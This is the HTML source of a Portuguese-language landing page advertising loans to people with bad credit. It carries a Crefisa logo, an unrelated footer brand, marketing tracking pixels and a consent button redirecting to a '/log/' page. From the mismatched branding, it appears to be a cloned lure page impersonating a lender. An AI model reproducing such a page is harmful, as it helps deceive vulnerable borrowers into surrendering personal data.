<html lang="pt-BR">
    
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    
    <head>
<script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-subids
  async
  defer
></script>            
<script>
    window.pixelId = "6768736b2226da3b4933a2c9";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
  </script>
  <!-- Meta Pixel Code -->
  <script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '1465888330757986');
  fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
  src="https://www.facebook.com/tr?id=1465888330757986&ev=PageView&noscript=1"
  /></noscript>
  <!-- End Meta Pixel Code -->
    <meta charset="UTF-8">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        .header {
            background: white;
            color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            grid-area: top-bar;
        }

        .main-content {
            max-width: 450px;
            background-color: white;
            text-align: center;
            padding: 2rem 2rem 1rem 2rem;
            border-radius: 10px;
            box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
            margin: 0 auto;
        }

        .main-content h2 {
            margin-bottom: 20px;
        }

        .btn-custom {
            color: white;
            border: none;
            width: 100%;
            margin-bottom: 5px;
            margin-top:5%;
            background: #FE0064;
            font-weight: 600;
            border-radius: 1rem;
            padding: .75rem 3rem;
            letter-spacing: .3px;
            line-height: 1.15;
        }

        .btn-custom:hover {
            color: black !important;
            background-color: #FE0064 !important;
            transform: scale(1.02) !important;
        }

        .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #e6007e;
            padding: 2rem 0.5rem;
            position: relative;
            margin-top: 50px;
        }

        #conclusao {
            display: none;
            /* Esconde o elemento por padrão */
        }

        #conclusao h4 {
            color: green;
            /* Define a cor do texto */
            font-weight: bold;
            /* Define o texto em negrito */
        }

        .char {
            border-top: solid px #00adca;
            background-color: #00adca;
            padding: 2px !important;
        }

        /* End custom CSS */
    </style>
 

    <script>
        !function (e, t) { "object" == typeof exports && "object" == typeof module ? module.exports = t() : "function" == typeof define && define.amd ? define([], t) : "object" == typeof exports ? exports.install = t() : e.install = t() }(window, (function () { return function (e) { var t = {}; function n(o) { if (t[o]) return t[o].exports; var r = t[o] = { i: o, l: !1, exports: {} }; return e[o].call(r.exports, r, r.exports, n), r.l = !0, r.exports } return n.m = e, n.c = t, n.d = function (e, t, o) { n.o(e, t) || Object.defineProperty(e, t, { enumerable: !0, get: o }) }, n.r = function (e) { "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 }) }, n.t = function (e, t) { if (1 & t && (e = n(e)), 8 & t) return e; if (4 & t && "object" == typeof e && e && e.__esModule) return e; var o = Object.create(null); if (n.r(o), Object.defineProperty(o, "default", { enumerable: !0, value: e }), 2 & t && "string" != typeof e) for (var r in e) n.d(o, r, function (t) { return e[t] }.bind(null, r)); return o }, n.n = function (e) { var t = e && e.__esModule ? function () { return e.default } : function () { return e }; return n.d(t, "a", t), t }, n.o = function (e, t) { return Object.prototype.hasOwnProperty.call(e, t) }, n.p = "", n(n.s = 0) }([function (e, t, n) { "use strict"; var o = this && this.__spreadArray || function (e, t, n) { if (n || 2 === arguments.length) for (var o, r = 0, i = t.length; r < i; r++)!o && r in t || (o || (o = Array.prototype.slice.call(t, 0, r)), o[r] = t[r]); return e.concat(o || Array.prototype.slice.call(t)) }; Object.defineProperty(t, "__esModule", { value: !0 }); var r = function (e, t, n) { var o, i = e.createElement("script"); i.type = "text/javascript", i.async = !0, i.src = t, n && (i.onerror = function () { r(e, n) }); var a = e.getElementsByTagName("script")[0]; null === (o = a.parentNode) || void 0 === o || o.insertBefore(i, a) }; !function (e, t, n) { e.KwaiAnalyticsObject = n; var i = e[n] = e[n] || []; i.methods = ["page", "track", "identify", "instances", "debug", "on", "off", "once", "ready", "alias", "group", "enableCookie", "disableCookie"]; var a = function (e, t) { e[t] = function () { for (var n = [], r = 0; r < arguments.length; r++)n[r] = arguments[r]; var i = o([t], n, !0); e.push(i) } }; i.methods.forEach((function (e) { a(i, e) })), i.instance = function (e) { var t, n = (null === (t = i._i) || void 0 === t ? void 0 : t[e]) || []; return i.methods.forEach((function (e) { a(n, e) })), n }, i.load = function (e, o) { var a = "https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js"; i._i = i._i || {}, i._i[e] = [], i._i[e]._u = a, i._t = i._t || {}, i._t[e] = +new Date, i._o = i._o || {}, i._o[e] = o || {}; var c = "?sdkid=".concat(e, "&lib=").concat(n); r(t, a + c, "https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js" + c) } }(window, document, "kwaiq") }]) }));
    </script>
    <script>
        kwaiq.load('510449167530721283');
        kwaiq.page();
    </script>
    <script type="text/javascript" async="" src="f.txt"></script>
<script async="" defer="" src="js/pixel.js"></script></head>

<body>

    <div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">

        <div class="header">
            <img decoding="async" style="width: 120px;" src="images/Crefisa.png" alt="Imagem Centralizada" data-lazy-src="https://upload.wikimedia.org/wikipedia/pt/a/a3/Crefisa.png" data-ll-status="loaded" class="entered lazyloaded"><noscript><img decoding="async" style="width: 120px;"
                    src="../wikipedia/pt/a/a3/Crefisa.png" alt="Imagem Centralizada"></noscript>
        </div>

        <div style="grid-area: content; padding: 0 1rem;">
            <div style="margin-top: 40px;padding: 1rem;" class="main-content">
                <div id="termos" class="mb-3">
                    <p style="color: gray">Empréstimo <strong>para negativados</strong> </p>
                    <div style="background-color: #f0f0f0; padding: 15px; border-radius: 8px; text-align: left;">
                        <ul>
                            <li>Crédito sujeito a análise e aprovação.</li>
                            <li>Os dados fornecidos por você a seguir serão utilizados para o processo de aquisição do
                                empréstimo.</li>
                            <li>Autorizo a consulta ao SCR - Sistema de Crédito do Banco Central e aos cadastros e
                                órgãos de proteção ao crédito.</li>
                        </ul>
                    </div>
                   <button class="btn-custom" onclick="redirectToLog()">Li e concordo</button>

<script>
    function redirectToLog() {
        // Captura os parâmetros UTM da URL atual
        const urlParams = new URLSearchParams(window.location.search);
        const utmParams = urlParams.toString();

        // Constrói a nova URL com os parâmetros UTM, se existirem
        let redirectUrl = '/log/';
        if (utmParams) {
            redirectUrl += '?' + utmParams;
        }

        // Redireciona para a nova URL
        window.location.href = redirectUrl;
    }
</script>

                </div>
            </div>
        </div>
    </div>

    <div class="footer py-4" id="footerChg">
        © 2024 Sim, Crédito Simples <br>
        Todos os direitos reservados
    </div>

    <script type="rocketlazyloadscript" data-minify="1" src="https://positivobrasil.org/wp-content/cache/min/1/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js?ver=1724603965" defer=""></script>

<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>



</body></html>